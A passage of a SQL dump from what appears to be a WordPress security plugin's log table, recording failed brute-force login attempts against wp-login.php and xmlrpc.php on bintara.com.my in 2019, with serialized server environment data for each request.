.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566891112.4791\";s:12:\"REQUEST_TIME\";s:10:\"1566891112\";}}','notice','2019-08-27 07:31:54','2019-08-27 07:31:52',18200416,19498232,'https://bintara.com.my/xmlrpc.php',1,0,'167.71.33.117'),(23391,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"89.45.194.21\";s:11:\"REMOTE_PORT\";s:5:\"53283\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWTeRbdCvC5@KvzqwiFLdwAAAAU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566891589.7607\";s:12:\"REQUEST_TIME\";s:10:\"1566891589\";}}','notice','2019-08-27 07:39:51','2019-08-27 07:39:50',17685728,19176200,'https://bintara.com.my/wp-login.php',1,0,'89.45.194.21'),(23392,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"89.45.194.21\";s:11:\"REMOTE_PORT\";s:5:\"53846\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWTeSYtV65@1l3w0lHNmtAAAAFU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566891593.5666\";s:12:\"REQUEST_TIME\";s:10:\"1566891593\";}}','notice','2019-08-27 07:39:55','2019-08-27 07:39:53',18200896,19498680,'https://bintara.com.my/xmlrpc.php',1,0,'89.45.194.21'),(23393,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"138.68.217.101\";s:11:\"REMOTE_PORT\";s:5:\"48268\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWTgP4tV65@1l3w0lHNoTwAAAFc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566892095.4663\";s:12:\"REQUEST_TIME\";s:10:\"1566892095\";}}','notice','2019-08-27 07:48:17','2019-08-27 07:48:15',17685024,19175160,'https://bintara.com.my/wp-login.php',1,0,'138.68.217.101'),(23394,0,'brute_force','invalid-login::username-test','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:4:\"test\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"472\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"138.68.217.101\";s:11:\"REMOTE_PORT\";s:5:\"48908\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWTgQ2XkG1atThADMYGniAAAANc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566892099.1499\";s:12:\"REQUEST_TIME\";s:10:\"1566892099\";}}','notice','2019-08-27 07:48:21','2019-08-27 07:48:19',18200096,19496960,'https://bintara.com.my/xmlrpc.php',1,0,'138.68.217.101'),(28485,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:83:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1571569397.9038879871368408203125\";s:14:\"CONTENT_LENGTH\";s:1:\"0\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1571569397.9038879871368408203125\";s:15:\"HTTP_USER_AGENT\";s:39:\"WordPress/5.1.3; https://bintara.com.my\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_CONTENT_LENGTH\";s:1:\"0\";s:30:\"REDIRECT_REDIRECT_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:39:\"REDIRECT_REDIRECT_CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:32:\"REDIRECT_REDIRECT_CONTEXT_PREFIX\";s:0:\"\";s:31:\"REDIRECT_REDIRECT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:29:\"REDIRECT_REDIRECT_ERROR_NOTES\";s:54:\"Script timed out before returning headers: wp-cron.php\";s:35:\"REDIRECT_REDIRECT_GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:29:\"REDIRECT_REDIRECT_HTTP_ACCEPT\";s:3:\"*/*\";s:38:\"REDIRECT_REDIRECT_HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:33:\"REDIRECT_REDIRECT_HTTP_CONNECTION\";s:5:\"close\";s:27:\"REDIRECT_REDIRECT_HTTP_HOST\";s:14:\"bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1571569397.9038879871368408203125\";s:33:\"REDIRECT_REDIRECT_HTTP_USER_AGENT\";s:39:\"WordPress/5.1.3; https://bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_X_HTTPS\";s:1:\"1\";s:22:\"REDIRECT_REDIRECT_PATH\";s:29:\"/sbin:/usr/sbin:/bin:/usr/bin\";s:30:\"REDIRECT_REDIRECT_QUERY_STRING\";s:47:\"doing_wp_cron=1571569397.9038879871368408203125\";s:29:\"REDIRECT_REDIRECT_REMOTE_ADDR\";s:12:\"103.6.198.69\";s:29:\"REDIRECT_REDIRECT_REMOTE_PORT\";s:5:\"32830\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:4:\"POST\";s:32:\"REDIRECT_REDIRECT_REQUEST_SCHEME\";s:5:\"https\";s:29:\"REDIRECT_REDIRECT_REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1571569397.9038879871368408203125\";s:33:\"REDIRECT_REDIRECT_SCRIPT_FILENAME\";s:52:\"/home/norfaiz/public_html/bintara.com.my/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SCRIPT_NAME\";s:12:\"/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SERVER_ADDR\";s:12:\"103.6.198.69\";s:30:\"REDIRECT_REDIRECT_SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:29:\"REDIRECT_REDIRECT_SERVER_NAME\";s:14:\"bintara.com.my\";s:29:\"REDIRECT_REDIRECT_SERVER_PORT\";s:3:\"443\";s:33:\"REDIRECT_REDIRECT_SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:34:\"REDIRECT_REDIRECT_SERVER_SIGNATURE\";s:0:\"\";s:33:\"REDIRECT_REDIRECT_SERVER_SOFTWARE\";s:6:\"Apache\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"500\";s:29:\"REDIRECT_REDIRECT_SUPHP_GROUP\";s:7:\"norfaiz\";s:31:\"REDIRECT_REDIRECT_SUPHP_HANDLER\";s:28:\"application/x-httpd-ea-php56\";s:28:\"REDIRECT_REDIRECT_SUPHP_USER\";s:7:\"norfaiz\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xaw@9R8r@wEAesy2W-X86wAAAFY\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"500\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xaw@9R8r@wEAesy2W-X86wAAAFY\";s:12:\"REDIRECT_URL\";s:10:\"/500.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"103.6.198.69\";s:11:\"REMOTE_PORT\";s:5:\"32830\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:10:\"SCRIPT_URL\";s:12:\"/wp-cron.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xaw@9R8r@wEAesy2W-X86wAAAFY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571570303.441\";s:12:\"REQUEST_TIME\";s:10:\"1571570303\";}}','notice','2019-10-20 11:18:32','2019-10-20 11:18:27',35001088,35253744,'https://bintara.com.my/wp-cron.php?doing_wp_cron=1571569397.9038879871368408203125',1,0,'103.6.198.69'),(23348,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"43.239.148.94\";s:11:\"REMOTE_PORT\";s:5:\"42270\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWSLRYir4pgxiIHnHK4v2AAAAdg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566870341.4401\";s:12:\"REQUEST_TIME\";s:10:\"1566870341\";}}','notice','2019-08-27 01:45:42','2019-08-27 01:45:41',18202048,19500504,'https://bintara.com.my/xmlrpc.php',1,0,'43.239.148.94'),(23349,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"87\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"185.22.187.229\";s:11:\"REMOTE_PORT\";s:5:\"51287\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWSUBx90bn5mtr-PXqrcrwAAAEQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566872583.5131\";s:12:\"REQUEST_TIME\";s:10:\"1566872583\";}}','notice','2019-08-27 02:23:04','2019-08-27 02:23:03',17684400,19173784,'https://bintara.com.my/wp-login.php',1,0,'185.22.187.229'),(23350,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"87\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 